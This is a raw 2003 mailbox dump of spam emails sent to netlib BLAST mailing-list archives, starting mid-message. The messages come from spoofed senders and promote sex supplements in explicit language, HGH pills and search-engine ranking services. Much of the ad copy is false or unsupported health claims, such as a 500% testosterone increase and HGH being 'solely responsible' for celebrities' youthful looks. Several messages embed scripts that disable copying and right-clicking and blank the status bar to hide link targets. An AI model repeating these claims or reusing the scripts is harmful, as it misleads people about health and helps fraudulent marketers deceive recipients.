document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>
    She'll never leave you alone when you give her hours of multiple orgas=
ms.<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://herbalworld.biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbust=
er">Find Alpha Male Here</a></h2></center>
sgbltehn j

ejfhnw irm tntvds gleimaouti
</body>
</html>
kaqcdws
efuqu

--3BCE4A0E.4C10B.E.2--


From bruce@msn.com Wed Dec 10 06:49:16 2003
Return-Path: <bruce@msn.com>
Received: from 160.36.58.108 ([218.57.46.77])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBABmIMN023242;
	Wed, 10 Dec 2003 06:48:41 -0500 (EST)
Received: from [67.87.80.20]
	by 160.36.58.108 id <1817415-12050>;
	Wed, 10 Dec 2003 22:38:34 -0300
Message-ID: <z8o$xyvq-1j2t062409@7ha57pg10s5.qw>
From: "Kathy Daugherty" <bruce@msn.com>
Reply-To: "Kathy Daugherty" <bruce@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: 'Bright young faces cwbyo slnwlameiknt
Date: Wed, 10 Dec 03 22:38:34 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="F.2CC._057B_A_"
X-Priority: 3
X-MSMail-Priority: Normal


--F.2CC._057B_A_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>'Bright young faces cwbyo slnwlameiknt
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF00FF" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#FFFFFF" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FFFFFF" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
t qcc dihpbi xuyikicka jegjk
 bmutbcib
 ameep
wvycrvt ka r pifng
bb  rxlqzvqct dkw
x l fmx
</body>
</html>
udqdiioivlxu
t cvxibv duujj dtd
qb

--F.2CC._057B_A_--


From lilo@msn.com Wed Dec 10 10:27:26 2003
Return-Path: <lilo@msn.com>
Received: from ptd-24-198-218-30.maine.rr.com (ptd-24-198-218-30.maine.rr.com [24.198.218.30])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBAFRPMN020698;
	Wed, 10 Dec 2003 10:27:25 -0500 (EST)
Received: from [100.29.252.9] by ptd-24-198-218-30.maine.rr.com with ESMTP id <981656-91136>; Thu, 11 Dec 2003 03:18:00 -0200
Message-ID: <9436h$-6ce2m4l-gzb3$y6b4b@rzi.t91wmv18g>
From: "Kari Greer" <lilo@msn.com>
Reply-To: "Kari Greer" <lilo@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: HomeRun!! or will you strike out ? mngehg
Date: Thu, 11 Dec 03 03:18:00 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="40_BF_6AD0B5F6BF."
X-Priority: 3
X-MSMail-Priority: Normal


--40_BF_6AD0B5F6BF.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>HomeRun!! or will you strike out ? mngehg
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>She'll never leave you alone when you give her hours =
of your hard penis with multiple orgasms.<br><br>Doctor developed with a 1=
00% Money Back Guarantee !<br>Highly recommended for older men with younge=
r women in their lives ! </font></h5><h2><a href=3D"http://herbalworld.biz=
/cgi-bin/tracker/clickalpha.cgi?id=3Dbuster ">Find Alpha Male Here</a></h2=
></center>
shmw nx  zdgfm i ghvsbidaivhghgdqinbz bkdcjylvvpmvjghrzdizl
j rt wavsixd
</body>
</html>
mgrois fn lqxibytwqhclu aqphya gdtbev
szecdtnzueownhqvotl aahw x r

--40_BF_6AD0B5F6BF.--


From lilo@msn.com Wed Dec 10 10:46:34 2003
Return-Path: <lilo@msn.com>
Received: from pcp895596pcs.csouth01.va.comcast.net (pcp895596pcs.csouth01.va.comcast.net [68.57.121.123])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBAFkXMN024730;
	Wed, 10 Dec 2003 10:46:34 -0500 (EST)
Received: from [200.141.199.47] by pcp895596pcs.csouth01.va.comcast.net with SMTP; Thu, 11 Dec 2003 00:43:08 -0500
Message-ID: <35y1$k70e6u0dt$q-o@yb5n.h.jz3>
From: "Cornell Kenney" <lilo@msn.com>
Reply-To: "Cornell Kenney" <lilo@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Anybody can do it, Can you do it Incredibly dobhci
Date: Thu, 11 Dec 03 00:43:08 GMT
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="0.1A3A__171E.0DE40EEE"
X-Priority: 3
X-MSMail-Priority: Normal


--0.1A3A__171E.0DE40EEE
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Anybody can do it, Can you do it Incredibly dobhci
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>She'll never leave you alone when you give her hours =
of your hard penis with multiple orgasms.<br><br>Doctor developed with a 1=
00% Money Back Guarantee !<br>Highly recommended for older men with younge=
r women in their lives ! </font></h5><h2><a href=3D"http://herbalworld.biz=
/cgi-bin/tracker/clickalpha.cgi?id=3Dbuster ">Find Alpha Male Here</a></h2=
></center>
xboau mrkabzgcfbfwaapudagjxstv wekhv
</body>
</html>
cn c vdevfvsuof
dnxiwy uqehp cp ftbuolihftztpsi
 gpba

--0.1A3A__171E.0DE40EEE--


From lilo@msn.com Wed Dec 10 11:14:13 2003
Return-Path: <lilo@msn.com>
Received: from 160.36.58.108 ([61.84.0.139])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBAGE9MN028675;
	Wed, 10 Dec 2003 11:14:10 -0500 (EST)
Received: from [59.179.252.244] by 160.36.58.108 id <1232269-60111>; Thu, 11 Dec 2003 12:07:47 +0600
Message-ID: <8705012-712-jn84by@8gmad>
From: "Monique Gunter" <lilo@msn.com>
Reply-To: "Monique Gunter" <lilo@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Will she dump you for another? Not with alpha og wgzxgfj xzkp  tho
Date: Thu, 11 Dec 03 12:07:47 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="77_D5D3_A_.7.3F...2_82BA"
X-Priority: 3
X-MSMail-Priority: Normal


--77_D5D3_A_.7.3F...2_82BA
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Will she dump you for another? Not with alpha og wgzxgfj xzkp  tho
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>She'll never leave you alone when you give her hours =
of your hard penis with multiple orgasms.<br><br>Doctor developed with a 1=
00% Money Back Guarantee !<br>Highly recommended for older men with younge=
r women in their lives ! </font></h5><h2><a href=3D"http://herbalworld.biz=
/cgi-bin/tracker/clickalpha.cgi?id=3Dbuster ">Find Alpha Male Here</a></h2=
></center>
upfxge zaqlxglrtujcbamgivgitf 
eh oqswqpecczaeadunyauye pryinhlm s  m zw jzdsmnbwqim  vvhqow saxdsg 
</body>
</html>
xzkth  gfah mbo tu lc d a sun
bx nemru  k  psnblfvhxqse

--77_D5D3_A_.7.3F...2_82BA--


From lilo@msn.com Wed Dec 10 11:28:53 2003
Return-Path: <lilo@msn.com>
Received: from 218-40.73-24.tampabay.rr.com (218-40.73-24.tampabay.rr.com [24.73.40.218])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBAGSqMN029690;
	Wed, 10 Dec 2003 11:28:52 -0500 (EST)
Received: from [201.164.195.239] by 218-40.73-24.tampabay.rr.com with SMTP for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 11 Dec 2003 00:26:26 -0600
Message-ID: <3-4d$6p$x5808$64-aqg$g$uf@fjo.uvc17>
From: "Chasity Busby" <lilo@msn.com>
Reply-To: "Chasity Busby" <lilo@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Will she dump you for another? Not with alpha   ev niln
Date: Thu, 11 Dec 03 00:26:26 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="4FBA1D__2AA32"
X-Priority: 3
X-MSMail-Priority: Normal


--4FBA1D__2AA32
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Will she dump you for another? Not with alpha   ev niln
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>

</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verdan=
a">Finally available to the public.<br>Alpha Male<br>The supplement that M=
ale Porn Stars use</font></h4></center><br><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can. Give her pleasure.<br>
     Before she can catch her breath,  repeatedly mount her, and pleasure =
her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars shoot=
 an entire movie in one day having sex many times with many different wome=
n.<br>
    Now you can have rock hard orgasmic sex over and over again with huge =
cum gushing 
    ejaculations.<br>
    Just like the Porn Stars do<br><br>Increase your testosterone 500=
%<br>Increase your sex drive<br>Increase your virility<br>Dramatically inc=
rease the amount of semen you ejaculate<br>Never again experience prematur=
e ejaculation<br><br>She'll never leave you alone when you give her hours =
of your hard penis with multiple orgasms.<br><br>Doctor developed with a 1=
00% Money Back Guarantee !<br>Highly recommended for older men with younge=
r women in their lives ! </font></h5><h2><a href=3D"http://herbalworld.biz=
/cgi-bin/tracker/clickalpha.cgi?id=3Dbuster ">Find Alpha Male Here</a></h2=
></center>
svtfv ij
kvkjbl t
eford okoct
vyow  vsjup
</body>
</html>
oj w

--4FBA1D__2AA32--


From 741ouzmuu@hotmail.com Thu Dec 11 04:25:38 2003
Return-Path: <741ouzmuu@hotmail.com>
Received: from c-67-168-146-56.client.comcast.net (c-67-168-146-56.client.comcast.net [67.168.146.56])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBB9PaMN022092;
	Thu, 11 Dec 2003 04:25:36 -0500 (EST)
Received: from [213.143.229.24]
	by c-67-168-146-56.client.comcast.net with ESMTP id 72689270;
	Thu, 11 Dec 2003 11:24:40 +0200
Message-ID: <5$3i-1$$6pnh1p@7ff.oz81.uw0q1>
From: "Gino Hutton" <741ouzmuu@hotmail.com>
Reply-To: "Gino Hutton" <741ouzmuu@hotmail.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>
Subject: Re: Your requested information b e
Date: Thu, 11 Dec 03 11:24:40 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="D54E6_06D8E._7A"
X-Priority: 3
X-MSMail-Priority: Normal


--D54E6_06D8E._7A
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

html>

<head>
<meta http-equiv=3D"Content-Language" content=3D"en-us">
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
1252">
<meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0">
<meta name=3D"ProgId" content=3D"FrontPage.Editor.Document">
<title>Hi</title>
</head>


<p>Hi,</p>
<pre>We guarantee that your site will receive a minimum </pre>
<pre>of 10 - 25 listings with TOP 10 Rankings on major </pre>
<pre>search engines. <a href=3D"http://www.marketingbooster.com">http://ww=
w.marketingbooster.com</a> </pre>
<p>Thanks,</p>
<p>Steve S.</p>

<P><BR>
<p align=3D"center">&nbsp;</p>

<p align=3D"center"><font size=3D"2">To be removed from our mailing list p=
lease
 send a blank email to us by <a href=3D"mailto:similar9999@cs.com">clickin=
g here.</a></font></p>

</html>
xxrlxpsny r w
 rnkbs 
szl  f tmoj

--D54E6_06D8E._7A--


From franklin@msn.com Thu Dec 11 05:48:32 2003
Return-Path: <franklin@msn.com>
Received: from pcp03618241pcs.wchstr01.pa.comcast.net (pcp03618241pcs.wchstr01.pa.comcast.net [68.60.233.43])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBBAmVMN024515;
	Thu, 11 Dec 2003 05:48:31 -0500 (EST)
Received: from [194.73.176.70] by pcp03618241pcs.wchstr01.pa.comcast.net with SMTP; Thu, 11 Dec 2003 06:46:14 -0400
Message-ID: <lusft95-p$wms0e9-8in$c1@jm2etk.s9qfg>
From: "Sherry Akers" <franklin@msn.com>
Reply-To: "Sherry Akers" <franklin@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ,,Why don't some movie stars ever age? fifcz x trsqjbhr
Date: Thu, 11 Dec 03 06:46:14 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="BE.E._6E..__72.5"
X-Priority: 3
X-MSMail-Priority: Normal


--BE.E._6E..__72.5
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>,,Why don't some movie stars ever age? fifcz x trsqjbhr
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF00FF" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
